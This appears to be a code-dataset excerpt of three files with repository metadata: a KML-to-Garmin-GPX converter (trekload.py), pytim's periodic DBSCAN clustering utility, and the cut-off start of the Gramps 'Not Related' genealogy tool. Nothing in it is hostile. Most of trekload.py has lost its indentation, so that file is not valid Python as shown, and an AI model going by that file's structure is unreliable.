"DIRAC"
] |
f8c49d359641c756317428f8c8d18ff9d5f902b34d9dfb8b2ef5a4667219fe37
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Trekload is licensed under the Revised BSD License:
#
# Copyright (c) 2013, Arvid Rudling
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The name(s) of its contributor(s) may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#TODO (bugs):
# handle style mappings embedded in waypoints
# handle Polygon
#User configured and test icon IDs
from trekload_conf import kml_to_ggpx_overrides, test_items
import unicodedata
import argparse
import os.path
import glob
import logging
import re
from random import random
from lxml import etree
import lxml.html.clean
#Garmin symbol code references are available here:
# http://home.online.no/~sigurdhu/MapSource-text.htm
# http://home.online.no/~sigurdhu/12MAP_symbols.htm
### Fenix specific constants
WAYPOINT_MEM_RESERVE = 25
FENIX_MAX_WAYPOINTS = 1000
FENIX_SYM_MISSING = (
'Ball Park',
'Bar',
'Beach',
'Bell',
'Bike Trail',
'Blue Pin',
'Bridge',
'Cemetery',
'Circle with X',
'City (Capitol)',
'City (small)',
    'Civil',
'Contact, Biker',
'Contact, Ranger',
'Controlled Area',
'Convenience Store',
'Crossing',
'Dam',
'Danger Area',
'Diver Down Flag 1',
'Diver Down Flag 2',
'Drinking Water',
'Exit',
'Fast Food',
'Forest',
'Green Diamond',
'Green Square',
'Horn',
'Hunting Area',
'Ice Skating Area',
'Large City',
'Light',
'Medium City',
'Movie Theater',
'Museum',
'Navaid, Amber',
'Navaid, White',
'Oil Field',
'Parking Area',
'Parking',
'Pharmacy',
'Pizza',
'Police Station',
'Post Office',
'Radio Beacon',
'Red Square',
'Restricted Area',
'RV Park',
'Scales',
'School',
'Shopping Center',
'Shopping',
'Short Tower',
'Small City',
'Summit',
'Tall Tower',
'Theater',
'Toll Booth',
'Truck Stop',
'Tunnel',
'Water Hydrant',
'White Buoy',
'Zoo',
)
FENIX_SYM_SET = (
'Airport',
'Amusement Park',
'Anchor',
'Bank',
'Boat Ramp',
'Building',
'Campground',
'Car',
'Dot, White',
'Fishing Area',
'Flag, Blue',
'Gas Station',
'Geocache Found',
'Geocache',
'Ghost Town',
'Golf Course',
'Heliport',
'Information',
'Levee',
'Lodging',
'Medical Facility',
    'Military',
'Parachute Area',
'Park',
'Picnic Area',
'Private Field', #rendered like 'Restricted Area'
'Residence',
'Restaurant',
'Restroom',
'Scenic Area',
'Skiing Area',
'Skull and Crossbones',
'Soft Field',
'Swimming Area',
'Telephone',
'Trail Head',
'Waypoint',
)
### Generic symbol constants
SYMBOL_DEFAULT = 'White Dot'
#Standard KML icon equivalents
kml_to_ggpx_symbols = {
    # 'http://maps.google.com/mapfiles/kml/shapes/grocery.png': 'Shopping Center',
    # 'http://mw1.google.com/mw-earth-vectordb/smartmaps_icons/museum-15.png': 'Museum',
    # 'http://maps.google.com/mapfiles/kml/pal4/icon61.png': 'Flag, Blue',
'http://maps.google.com/mapfiles/kml/shapes/cabs.png': 'Car',
'http://maps.google.com/mapfiles/kml/shapes/camera.png': 'Scenic Area',
'http://maps.google.com/mapfiles/kml/shapes/campground.png': 'Campground',
'http://maps.google.com/mapfiles/kml/shapes/caution.png': 'Skull and Crossbones',
'http://maps.google.com/mapfiles/kml/shapes/dining.png': 'Restaurant',
'http://maps.google.com/mapfiles/kml/shapes/dollar.png': 'Bank',
'http://maps.google.com/mapfiles/kml/shapes/fishing.png': 'Fishing Area',
'http://maps.google.com/mapfiles/kml/shapes/flag.png': 'Flag, Blue',
'http://maps.google.com/mapfiles/kml/shapes/gas_stations.png': 'Gas Station',
'http://maps.google.com/mapfiles/kml/shapes/golf.png': 'Golf Course',
'http://maps.google.com/mapfiles/kml/shapes/hiker.png': 'Trail Head',
'http://maps.google.com/mapfiles/kml/shapes/homegardenbusiness.png': 'Residence',
'http://maps.google.com/mapfiles/kml/shapes/hospitals.png': 'Medical Facility',
'http://maps.google.com/mapfiles/kml/shapes/info_circle.png': 'Information',
'http://maps.google.com/mapfiles/kml/shapes/lodging.png': 'Lodging',
'http://maps.google.com/mapfiles/kml/shapes/marina.png': 'Anchor',
'http://maps.google.com/mapfiles/kml/shapes/open-diamond.png': 'Dot, White',
'http://maps.google.com/mapfiles/kml/shapes/parking_lot.png': 'Car',
'http://maps.google.com/mapfiles/kml/shapes/parks.png': 'Park',
'http://maps.google.com/mapfiles/kml/shapes/phone.png': 'Telephone',
'http://maps.google.com/mapfiles/kml/shapes/picnic.png': 'Picnic Area',
'http://maps.google.com/mapfiles/kml/shapes/poi.png': 'Waypoint',
'http://maps.google.com/mapfiles/kml/shapes/ski.png': 'Skiing Area',
'http://maps.google.com/mapfiles/kml/shapes/swimming.png': 'Swimming Area',
'http://maps.google.com/mapfiles/kml/shapes/toilets.png': 'Restroom',
'http://maps.google.com/mapfiles/kml/shapes/airports.png': 'Airport',
'': SYMBOL_DEFAULT
}
kml_to_ggpx_symbols.update(kml_to_ggpx_overrides)
kml_to_ggpx_misses = set()
### KML & GPX format constants
gpx_version = "1.0"
kml_ns = {'kml': 'http://www.opengis.net/kml/2.2'}
# String that gets appended to the wp name when tracks are collapsed to their
# median points ('--tracks point' option)
median_point_suffix = '(mitten)'
class Track(object):
"""Represents a GIS track (multi-segment path between two locations)"""
def __init__(self, coords, name='Untitled', icon=None, description=None):
self.coords = []
self.coords.extend(coords)
self.name = name.encode('utf8')
self.icons = {}
self.description = description
if icon:
self._set_icon(icon[0], icon[1])
def _set_icon(self, format, id):
global kml_to_ggpx_misses
self.icons[format] = id
if format == 'kml':
if id in kml_to_ggpx_symbols:
self.icons['ggpx'] = kml_to_ggpx_symbols[self.icons['kml']]
else:
kml_to_ggpx_misses.add(self.icons['kml'])
self.icons['ggpx'] = None
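    # e.g. _set_icon('kml', 'http://maps.google.com/mapfiles/kml/shapes/cabs.png')
    # resolves self.icons['ggpx'] to 'Car' via kml_to_ggpx_symbols; unknown hrefs
    # are collected in kml_to_ggpx_misses and reported at the end of the run.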
@staticmethod
def _make_point(parent, coord, type_code):
wpt = etree.SubElement(parent, type_code, lat=str(coord[0]), lon=str(coord[1]))
if len(coord) == 3 and coord[2] != 0.0:
ele = etree.SubElement(wpt, 'ele')
ele.text = str(coord[2])
return wpt
def _make_metadata(self, parent, option=''):
name = etree.SubElement(parent, 'name')
#name.text = etree.CDATA(self.name.decode('utf-8'))
if option == 'point':
name.text = "%s %s" % (self.name.decode('utf-8'), median_point_suffix)
else:
name.text = self.name.decode('utf-8')
sym = etree.SubElement(parent, 'sym')
if 'ggpx' in self.icons:
sym.text = self.icons['ggpx']
else:
sym.text = SYMBOL_DEFAULT
if self.description:
desc = etree.SubElement(parent, 'desc')
#desc.text = etree.CDATA(self.description)
if len(self.description) > 50:
desc.text = self.description[0:49] + u"…"
else:
desc.text = self.description
def output_GPX(self, parent, option):
elem = None
if option == 'full':
elem = etree.SubElement(parent, 'trk')
seg = etree.SubElement(elem, 'trkseg')
assert (len(self.coords) > 0)
for c in self.coords:
Track._make_point(seg, c, type_code='trkpt')
elif option == 'point':
            pt = self.coords[len(self.coords) // 2]
elem = Track._make_point(parent, pt, type_code='wpt')
if elem is None:
assert (option == 'skip')
else:
self._make_metadata(elem, option)
def __str__(self):
return "%s: %s, - %s" % (
self.name,
self.coords,
self.icons)
class Waypoint(Track):
"""Representation of GIS waypoint"""
def __init__(self, coord3D, name='Untitled', icon=None, description=None):
Track.__init__(self, [coord3D], name, icon, description)
def output_GPX(self, parent, option=''):
if len(self.coords) == 1:
wpt = Waypoint._make_point(parent, self.coords[0], type_code='wpt')
self._make_metadata(wpt)
else:
assert (len(self.coords) == 0)
class KMLDocument(object):
"""KML document loader/parser class"""
def __init__(self, path):
self.path = path
self.data = None
self.stylemap = {}
self.waypoints = []
def read(self):
"""Read KML data from file at self.path"""
kml = etree.parse(self.path)
style_definitions = {}
        line_string_pattern = re.compile(
            r"\s*(?:([-]?[\d]*[\.]?[\d]+),)(?:([-]?[\d]*[\.]?[\d]+),)?([-]?[\d]*[\.]?[\d]+)\s+")
#read style definitions
for style in kml.xpath('//kml:Document/kml:Style', namespaces=kml_ns):
id = style.attrib['id']
assert id
icon_list = style.xpath('kml:IconStyle/kml:Icon/kml:href', namespaces=kml_ns)
if len(icon_list) > 0:
icon_href = icon_list[0].text
else:
icon_href = ''
style_definitions[id] = icon_href
#generate self.stylemap from style_definitions and StyleMap pairs
for style_mapping in kml.xpath('//kml:Document/kml:StyleMap', namespaces=kml_ns):
url = None
for pair in style_mapping.xpath('kml:Pair', namespaces=kml_ns):
if pair.findtext('kml:key', namespaces=kml_ns) == 'normal':
style_url = pair.findtext('kml:styleUrl', namespaces=kml_ns)[1:]
assert (style_url)
self.stylemap[style_mapping.attrib['id']] = style_definitions[style_url]
                    #logging.debug("%s -> %s" % (style_mapping.attrib['id'], style_definitions[style_url]))
for placemark in kml.xpath('//kml:Placemark', namespaces=kml_ns):
points = placemark.xpath('kml:Point', namespaces=kml_ns)
name = placemark.findtext('kml:name', namespaces=kml_ns)
style = placemark.findtext('kml:styleUrl', namespaces=kml_ns)
desc_str = placemark.findtext('kml:description', namespaces=kml_ns)
desc = None
if desc_str:
desc_html = lxml.html.fromstring(desc_str)
cleaner = lxml.html.clean.Cleaner(allow_tags=[], remove_unknown_tags=True)
stripped_html = cleaner.clean_html(desc_html)
desc = stripped_html.text_content()
if style is not None:
if style[0] == '#':
style = style[1:]
if style in self.stylemap:
icon = self.stylemap[style]
else:
icon = None
logging.warning("Could not find style mapping %s on %s, skipping icon" % (style, name))
else:
icon = style
else:
icon = None
#TODO: support inline style mappings
logging.warning("No style URL for %s, skipping icon" % name)
coords = []
if len(points) == 1:
point = points[0]
raw_coords = point.findtext('kml:coordinates', namespaces=kml_ns).split(',')
if len(raw_coords) >= 3:
point = (float(raw_coords[1]), float(raw_coords[0]), float(raw_coords[2]))
else:
point = (float(raw_coords[1]), float(raw_coords[0]))
read_waypoint = Waypoint(point, name, ('kml', icon), description=desc)
self.waypoints.append(read_waypoint)
else:
line_coords_chunk = placemark.findtext('kml:LineString/kml:coordinates', namespaces=kml_ns)
if line_coords_chunk is not None:
line_tokens = line_string_pattern.findall(line_coords_chunk)
try:
for c in line_tokens:
                            # findall always yields 3 groups; group 2 is '' for 2-D coords
                            if c[1]:  # three fields: lon, lat, elevation
                                coords.append((float(c[1]), float(c[0]), float(c[2])))
                            else:  # two fields: lon, lat
                                coords.append((float(c[2]), float(c[0])))
except ValueError:
logging.error("Could not parse %s (%s) to float coordinates" % (c, name))
raise
read_track = Track(coords, name, ('kml', icon), description=desc)
self.waypoints.append(read_track)
else:
polygon = placemark.findtext('kml:Polygon', namespaces=kml_ns)
if polygon is not None:
#TODO: support polygons, could be output as tracks
logging.error("Skipping '%s' - polygon placemarks not currently supported" % name)
else:
erroneous_features = placemark.xpath('kml:*', namespaces=kml_ns)
error_descriptions = []
for err in erroneous_features:
error_descriptions.append(err.tag.split('}')[1])
logging.error(
"Skipping '%s' b/c unrecognized placemark contents (%s)" % (name, str(", ").join(error_descriptions)))
class GarminGPXDocument(object):
"""GPX file writer"""
def __init__(self, name='output'):
udata = name.decode("utf-8")
#Make name pure ASCII and lowercase to improve chances of name matches
#between subsequent runs
self.name = udata.encode('ascii', 'ignore').lower()
self.waypoints = []
self.data = etree.Element('gpx',
version=gpx_version,
creator='trekload',
#attrib={'{xsi}schemaLocation':'http://www.topografix.com/GPX/1/0/gpx.xsd'},
nsmap={ #'wptx1' : 'http://www.garmin.com/xmlschemas/WaypointExtension/v1',
#'gpxx':'http://www.garmin.com/xmlschemas/GpxExtensions/v3',
#'gpxtpx':'http://www.garmin.com/xmlschemas/TrackPointExtension/v1',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
None: 'http://www.topografix.com/GPX/1/0'}
)
self.xml = etree.ElementTree(self.data)
def add_points(self, wpoint_list):
for wpoint in wpoint_list:
self.add_point(wpoint)
def add_point(self, wpoint):
self.waypoints.append(wpoint)
def close(self, option):
# Save to XML file
previous_paths = glob.glob("%s_*[0-9].gpx" % self.name)
new_path = '%s_%d.gpx' % (self.name, len(self.waypoints))
output_file = open(new_path, 'wb')
for wp in self.waypoints:
wp.output_GPX(self.data, option=option)
self.xml.write(output_file, xml_declaration=True, encoding='utf-8')
if len(previous_paths) == 1:
#Only delete previous file if exactly 1 was found
previous_file_path = previous_paths[0]
if not os.path.samefile(previous_file_path, new_path):
#If name of new file is the same, it has been overwritten
logging.info("Deleting previous file %s" % previous_file_path)
os.remove(previous_file_path)
elif len(previous_paths) > 1:
#if several were found, display warning
logging.warning("""Found more than one previous file (%d).
To avoid data loss, you have to manually delete previous files.
New file name is '%s'""" % (len(previous_paths), new_path))
### Main program flow
parser = argparse.ArgumentParser(description='Process KML data and write to Garmin Fenix as .gpx')
parser.add_argument('--test', action="store_true",
help='Output test gpx with symbols 0-test max')
parser.add_argument('--tracks', default='point',
help='KML tracks: full, point or skip. Default: point')
parser.add_argument('--dest', metavar='OUTPUT', default=None,
help="Specify a destination for output file. Must be a directory. Default: Fenix' GPX folder")
parser.add_argument('--input', default=os.path.expanduser('~/Desktop/'),
help='Input KML file (ignored in test mode)')
parser.add_argument('--log', default='debug',
help='Logging level')
args = parser.parse_args()
#Logging
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(args.log, logging.NOTSET)
logging.basicConfig(level=logging.DEBUG)
#Destination
if args.dest is None:
dest_dir = "/Volumes/GARMIN/Garmin/GPX/"
if not os.path.isdir(dest_dir):
raise IOError(u"Fenix is not mounted. Check your connections or specify a different destination argument")
else:
dest_dir = os.path.abspath(args.dest)
assert (os.path.isdir(dest_dir))
waypoint_counter = 0
if args.test:
#Test mode
test_center = (59.6, 16.53)
test_radius = 0.1
output_doc = GarminGPXDocument(os.path.join(dest_dir, 'trekload_test'))
test_step = test_radius / (len(test_items) + 1)
r = test_step
#for d in range(0, args.test):
for d in test_items:
direction = [random() * 2.0 - 1.0, random() * 2.0 - 1.0]
r += test_step
offset = [v * r for v in direction]
test_point = [test_center[i] + offset[i] for i in range(0, 2)]
test_wp = Waypoint(test_point, name=d, icon=('ggpx', str(d)))
output_doc.add_point(test_wp)
    output_doc.close(option=args.tracks)
else:
#regular conversion (non-test) mode
#input file/dir
input_ = os.path.abspath(args.input)
input_files = []
if os.path.isdir(input_):
for fileName in os.listdir(input_):
splitName = os.path.splitext(fileName)
if len(splitName) > 1:
fileType = splitName[1]
if fileType.lower() == '.kml':
input_files.append(os.path.join(input_, fileName))
else:
assert (os.path.exists(input_))
input_files.append(input_)
#Iterate through input files
for input_file in input_files:
dest_filename = os.path.splitext(os.path.basename(input_file))[0]
output_doc = GarminGPXDocument(os.path.join(dest_dir, dest_filename))
input_ = KMLDocument(input_file)
input_.read()
output_doc.add_points(input_.waypoints)
output_doc.close(option=args.tracks)
num_waypoints = len(output_doc.waypoints)
logging.info("Wrote %s\t(%d waypoints)" % (dest_filename, num_waypoints))
waypoint_counter += num_waypoints
#Report number of waypoints written
if kml_to_ggpx_misses:
print ("The following icons have no GGPX->KML, their placemarks were written without icon:")
for miss in kml_to_ggpx_misses:
print "'%s': '???'," % miss
#FIXME: actually counts number of waypoints AND tracks
#(each complete track counts as one point)
if waypoint_counter >= FENIX_MAX_WAYPOINTS:
logging.warning("Waypoint memory exhausted (%s) by this loading session" % waypoint_counter)
elif waypoint_counter > FENIX_MAX_WAYPOINTS - WAYPOINT_MEM_RESERVE:
logging.warning("Waypoint memory almost exhausted (%s) by this loading session" % waypoint_counter)
else:
logging.info("Wrote %d tracks or waypoints" % waypoint_counter)
|
arru/trekload
|
trekload.py
|
Python
|
bsd-3-clause
| 18,631
|
[
"Amber"
] |
a048dda055501ed3d8d529514ff6a05fa2e6065a219ae96d02ca9ebb288858ff
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
from __future__ import print_function
import numpy as np
from scipy.cluster import vq
from scipy.spatial import cKDTree
from pytim_dbscan import dbscan_inner
def determine_samples(threshold_density, cluster_cut, n_neighbors):
    if threshold_density is None:
        return 2
if isinstance(threshold_density, (float, int)):
min_samples = threshold_density * 4. / 3. * np.pi * cluster_cut**3
elif (threshold_density == 'auto'):
modes = 2
centroid, _ = vq.kmeans2(
n_neighbors * 1.0, modes, iter=10, check_finite=False)
min_samples = np.max(centroid)
else:
raise ValueError("Wrong value of 'threshold_density' passed\
to do_cluster_analysis_DBSCAN() ")
return np.max([min_samples, 2])
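# e.g. threshold_density=0.009 (in inverse cubic trajectory units, typically
# Angstrom^-3) with cluster_cut=8.5 gives
# min_samples ~= 0.009 * 4/3 * pi * 8.5**3 ~= 23 neighbors.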
def do_cluster_analysis_dbscan(group,
cluster_cut,
threshold_density=None,
molecular=True):
""" Performs a cluster analysis using DBSCAN
:returns [labels,counts,neighbors]: lists of the id of the cluster to
which every atom is belonging to, of the
number of elements in each cluster, and of
the number of neighbors for each atom
according to the specified criterion.
Uses a slightly modified version of DBSCAN from sklearn.cluster
that takes periodic boundary conditions into account (through
cKDTree's boxsize option) and collects also the sizes of all
clusters. This is on average O(N log N) thanks to the O(log N)
scaling of the kdtree.
"""
box = group.universe.dimensions[:3]
# NOTE: extra_cluster_groups are not yet implemented
points = group.atoms.positions[:]
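    # cKDTree's boxsize option makes neighbour queries periodic, so the
    # coordinates must already lie inside the box (hence pack_into_box in the
    # doctest below).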
tree = cKDTree(points, boxsize=box[:3])
neighborhoods = np.array([
np.array(neighbors)
for neighbors in tree.query_ball_point(points, cluster_cut, n_jobs=-1)
])
if len(neighborhoods.shape) != 1:
raise ValueError("Error in do_cluster_analysis_DBSCAN(), the cutoff\
is probably too small")
if molecular is False:
n_neighbors = np.array([len(neighbors) for neighbors in neighborhoods])
else:
n_neighbors = np.array([
len(np.unique(group[neighbors].resids))
for neighbors in neighborhoods
])
min_samples = determine_samples(threshold_density, cluster_cut,
n_neighbors)
labels = -np.ones(points.shape[0], dtype=np.intp)
counts = np.zeros(points.shape[0], dtype=np.intp)
core_samples = np.asarray(n_neighbors >= min_samples, dtype=np.uint8)
dbscan_inner(core_samples, neighborhoods, labels, counts)
return labels, counts, n_neighbors
def _():
"""
This is a collection of tests to check
that the DBSCAN behavior is kept consistent
>>> import MDAnalysis as mda
>>> import pytim
>>> pytim.utilities_dbscan._() ; # coverage
>>> import numpy as np
>>> from pytim.datafiles import ILBENZENE_GRO
>>> from pytim.utilities import do_cluster_analysis_dbscan as DBScan
>>> u = mda.Universe(ILBENZENE_GRO)
>>> benzene = u.select_atoms('name C and resname LIG')
>>> u.atoms.positions = u.atoms.pack_into_box()
>>> l,c,n = DBScan(benzene, cluster_cut = 4.5, threshold_density = None)
>>> l1,c1,n1 = DBScan(benzene, cluster_cut = 8.5, threshold_density = 'auto')
>>> td = 0.009
>>> l2,c2,n2 = DBScan(benzene, cluster_cut = 8.5, threshold_density = td)
>>> print (np.sort(c)[-2:])
[ 12 14904]
>>> print (np.sort(c2)[-2:])
[ 0 9335]
>>> print ((np.all(c1==c2), np.all(l1==l2)))
(True, True)
"""
pass
|
balazsfabian/pytim
|
pytim/utilities_dbscan.py
|
Python
|
gpl-3.0
| 3,974
|
[
"MDAnalysis"
] |
649e60e09c7ff6b788d6686a22b86685140323cbd1b34401a31a813f22da4805
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2007-2009 Stephane Charette
# Copyright (C) 2008 Brian Matherly
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2010 Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"Find people who are not related to the selected person"
#------------------------------------------------------------------------
#
# GNOME/GTK modules
#
#------------------------------------------------------------------------
from gi.repository import Gtk
from gi.repository import GObject
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
ngettext = glocale.translation.ngettext # else "nearby" comments are ignored
from gramps.gen.const import URL_MANUAL_PAGE
from gramps.gen.errors import WindowActiveError
from gramps.gui.plug import tool
from gramps.gen.plug.report import utils
from gramps.gui.editors import EditPerson, EditFamily
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.utils import ProgressMeter
from gramps.gui.display import display_help
from gramps.gui.glade import Glade
from gramps.gen.lib import Tag
from gramps.gen.db import DbTxn
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
WIKI_HELP_PAGE = '%s_-_Tools' % URL_MANUAL_PAGE
WIKI_HELP_SEC = _('manual|Not_Related')
#------------------------------------------------------------------------
#
# NotRelated class
#
#------------------------------------------------------------------------
class NotRelated(tool.ActivePersonTool, ManagedWindow):
def __init__(self, dbstate, user, options_class, name, callback=None):
uistate = user.uistate
tool.ActivePersonTool.__init__(self, dbstate, uistate, options_class,
name)
if self.fail: # bug #2709 -- fail if we have no active person
return
person_handle = uistate.get_active('Person')
person = dbstate.db.get_person_from_handle(person_handle)
self.name = person.get_primary_name().get_regular_name()
self.title = _('Not related to "%s"') % self.name
ManagedWindow.__init__(self, uistate, [], self.__class__)
self.dbstate = dbstate
self.uistate = uistate
self.db = dbstate.db
topDialog = Glade()
topDialog.connect_signals({
"destroy_passed_object" : self.close,
"on_help_clicked" : self.on_help_clicked,
"on_delete_event" : self.close,
})
window = topDialog.toplevel
title = topDialog.get_object("title")
self.set_window(window, title, self.title)
self.setup_configs('interface.notrelated', 450, 400)
self.tagcombo = topDialog.get_object("tagcombo")
tagmodel = Gtk.ListStore(str)
self.tagcombo.set_model(tagmodel)
self.tagcombo.set_entry_text_column(0)
tagmodel.append((_('ToDo'),))
tagmodel.append((_('NotRelated'),))
self.tagcombo.set_sensitive(False)
self.tagapply = topDialog.get_object("tagapply")
self.tagapply.set_sensitive(False)
self.tagapply.connect('clicked', self.applyTagClicked)
# start the progress indicator
self.progress = ProgressMeter(self.title, _('Starting'),
parent=self.uistate.window)
# setup the columns
self.model = Gtk.TreeStore(
GObject.TYPE_STRING, # 0==name
GObject.TYPE_STRING, # 1==person gid
GObject.TYPE_STRING, # 2==parents
GObject.TYPE_STRING, # 3==tags
GObject.TYPE_STRING) # 4==family gid (not shown to user)
# note -- don't assign the model to the tree until it has been populated,
# otherwise the screen updates are terribly slow while names are appended
self.treeView = topDialog.get_object("treeview")
col1 = Gtk.TreeViewColumn(_('Name'), Gtk.CellRendererText(), text=0)
col2 = Gtk.TreeViewColumn(_('ID'), Gtk.CellRendererText(), text=1)
col3 = Gtk.TreeViewColumn(_('Parents'), Gtk.CellRendererText(), text=2)
col4 = Gtk.TreeViewColumn(_('Tags'), Gtk.CellRendererText(), text=3)
col1.set_resizable(True)
col2.set_resizable(True)
col3.set_resizable(True)
col4.set_resizable(True)
col1.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col2.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col3.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col4.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
col1.set_sort_column_id(0)
# col2.set_sort_column_id(1)
# col3.set_sort_column_id(2)
col4.set_sort_column_id(3)
self.treeView.append_column(col1)
self.treeView.append_column(col2)
self.treeView.append_column(col3)
self.treeView.append_column(col4)
self.treeSelection = self.treeView.get_selection()
self.treeSelection.set_mode(Gtk.SelectionMode.MULTIPLE)
self.treeSelection.set_select_function(self.selectIsAllowed, None)
self.treeSelection.connect('changed', self.rowSelectionChanged)
self.treeView.connect('row-activated', self.rowActivated)
# initialize a few variables we're going to need
self.numberOfPeopleInDatabase = self.db.get_number_of_people()
self.numberOfRelatedPeople = 0
self.numberOfUnrelatedPeople = 0
# create the sets used to track related and unrelated people
self.handlesOfPeopleToBeProcessed = set()
self.handlesOfPeopleAlreadyProcessed = set()
self.handlesOfPeopleNotRelated = set()
# build a set of all people related to the selected person
self.handlesOfPeopleToBeProcessed.add(person.get_handle())
self.findRelatedPeople()
# now that we have our list of related people, find everyone
# in the database who isn't on our list
self.findUnrelatedPeople()
# populate the treeview model with the names of unrelated people
if self.numberOfUnrelatedPeople == 0:
# feature request 2356: avoid genitive form
title.set_text(_('Everyone in the database is related to %s') % self.name)
else:
self.populateModel()
self.model.set_sort_column_id(0, Gtk.SortType.ASCENDING)
self.treeView.set_model(self.model)
# self.treeView.set_row_separator_func(self.iterIsSeparator, None)
self.treeView.expand_all()
# done searching through the database, so close the progress bar
self.progress.close()
self.show()
def iterIsSeparator(self, model, iter):
# return True only if the row is to be treated as a separator
if self.model.get_value(iter, 1) == '': # does the row have a GID?
return True
return False
def selectIsAllowed(self, selection, model, path, isSelected, userData):
# return True/False depending on if the row being selected is a leaf node
iter = self.model.get_iter(path)
if self.model.get_value(iter, 1) == '': # does the row have a GID?
return False
return True
def rowSelectionChanged(self, selection):
state = selection.count_selected_rows() > 0
self.tagcombo.set_sensitive(state)
self.tagapply.set_sensitive(state)
def rowActivated(self, treeView, path, column):
# first we need to check that the row corresponds to a person
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
familyGid = self.model.get_value(iter, 4)
if familyGid != '': # do we have a family?
# get the parent family for this person
family = self.db.get_family_from_gramps_id(familyGid)
if family:
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
elif personGid != '': # do we have a person?
# get the person that corresponds to this GID
person = self.db.get_person_from_gramps_id(personGid)
if person:
try:
EditPerson(self.dbstate, self.uistate, [], person)
except WindowActiveError:
pass
def on_help_clicked(self, obj):
"""Display the relevant portion of Gramps manual"""
display_help(WIKI_HELP_PAGE, WIKI_HELP_SEC)
def applyTagClicked(self, button):
progress = None
rows = self.treeSelection.count_selected_rows()
tag_name = str(self.tagcombo.get_active_text())
# start the db transaction
with DbTxn("Tag not related", self.db) as transaction:
tag = self.db.get_tag_from_name(tag_name)
if not tag:
# create the tag if it doesn't already exist
tag = Tag()
tag.set_name(tag_name)
tag.set_priority(self.db.get_number_of_tags())
tag_handle = self.db.add_tag(tag, transaction)
else:
tag_handle = tag.get_handle()
# if more than 1 person is selected, use a progress indicator
if rows > 1:
progress = ProgressMeter(self.title, _('Starting'),
parent=self.window)
progress.set_pass(
# translators: leave all/any {...} untranslated
#TRANS: no singular form needed, as rows is always > 1
ngettext("Setting tag for {number_of} person",
"Setting tag for {number_of} people",
rows).format(number_of=rows),
rows)
# iterate through all of the selected rows
(model, paths) = self.treeSelection.get_selected_rows()
for path in paths:
if progress:
progress.step()
# for the current row, get the GID and the person from the database
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
person = self.db.get_person_from_gramps_id(personGid)
# add the tag to the person
person.add_tag(tag_handle)
# save this change
self.db.commit_person(person, transaction)
# refresh the tags column
self.treeView.set_model(None)
for path in paths:
iter = self.model.get_iter(path)
personGid = self.model.get_value(iter, 1)
person = self.db.get_person_from_gramps_id(personGid)
self.model.set_value(iter, 3, self.get_tag_list(person))
self.treeView.set_model(self.model)
self.treeView.expand_all()
if progress:
progress.close()
def findRelatedPeople(self):
self.progress.set_pass(
# translators: leave all/any {...} untranslated
#TRANS: No singular form is needed.
ngettext("Finding relationships between {number_of} person",
"Finding relationships between {number_of} people",
self.numberOfPeopleInDatabase
).format(number_of=self.numberOfPeopleInDatabase),
self.numberOfPeopleInDatabase)
# as long as we have people we haven't processed yet, keep looping
while len(self.handlesOfPeopleToBeProcessed) > 0:
handle = self.handlesOfPeopleToBeProcessed.pop()
### DEBUG DEBUG DEBUG
# if len(self.handlesOfPeopleAlreadyProcessed) > 50:
# break
###
# see if we've already processed this person
if handle in self.handlesOfPeopleAlreadyProcessed:
continue
person = self.db.get_person_from_handle(handle)
# if we get here, then we're dealing with someone new
self.progress.step()
# remember that we've now seen this person
self.handlesOfPeopleAlreadyProcessed.add(handle)
